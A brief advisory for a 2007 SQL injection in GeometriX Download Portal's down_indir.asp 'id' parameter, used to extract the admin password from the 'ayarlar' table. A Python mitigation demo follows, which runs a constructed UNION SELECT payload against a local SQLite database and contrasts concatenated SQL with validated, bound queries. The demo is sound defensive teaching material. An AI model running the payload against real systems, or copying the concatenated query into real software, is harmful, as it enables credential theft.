vendor:
by: CyberGhost
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
GeometriX Download Portal Remote SQL Injection Vulnerability
The vulnerability allows an attacker to perform a SQL injection attack by manipulating the 'id' parameter in the 'down_indir.asp' file. By using a UNION SELECT statement, the attacker can retrieve sensitive information, such as the 'adminsifre' (admin password) from the 'ayarlar' (settings) table.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, it is advised to use parameterized queries or prepared statements to prevent SQL injection attacks.
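The mitigation above as an added example (not code from the advisory or from the GeometriX portal): it contrasts string-concatenated SQL with allow-list validation plus a bound parameter. It assumes Python with an in-memory SQLite database in place of the portal's ASP code and database, which the advisory does not show. The 'downloads' table, its columns, the function names and all sample values are constructed; only 'ayarlar' and 'adminsifre' come from the advisory.

```python
import sqlite3

def make_db():
    """Constructed stand-in database; 'downloads' is a hypothetical table name."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE downloads (id INTEGER PRIMARY KEY, url TEXT);
        CREATE TABLE ayarlar (adminsifre TEXT);
        INSERT INTO downloads VALUES (1, '/files/setup.zip');
        INSERT INTO ayarlar VALUES ('constructed-secret');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # 'Before' pattern: the request value becomes part of the SQL text,
    # so SQL keywords inside it are parsed and executed.
    sql = "SELECT url FROM downloads WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def parse_id(raw_id):
    # Allow-list validation: ASCII digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)

def lookup_bound_only(db, raw_id):
    # Parameter binding alone: the whole string is compared as one value
    # and is never parsed as SQL.
    sql = "SELECT url FROM downloads WHERE id = ?"
    return [row[0] for row in db.execute(sql, (raw_id,))]

def lookup_safe(db, raw_id):
    # Recommended form: validate first, then bind the integer.
    sql = "SELECT url FROM downloads WHERE id = ?"
    return [row[0] for row in db.execute(sql, (parse_id(raw_id),))]

# Constructed input shaped like the UNION SELECT the advisory describes.
HOSTILE = "0 UNION SELECT adminsifre FROM ayarlar"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_vulnerable(db, HOSTILE))
    print("bound only:  ", lookup_bound_only(db, HOSTILE))
    print("safe, id=1:  ", lookup_safe(db, "1"))
    try:
        lookup_safe(db, HOSTILE)
    except ValueError as exc:
        print("safe, hostile input rejected:", exc)
```

Rejected values are worth logging on the server side, since a non-numeric 'id' sent to a numeric endpoint is a useful probing signal.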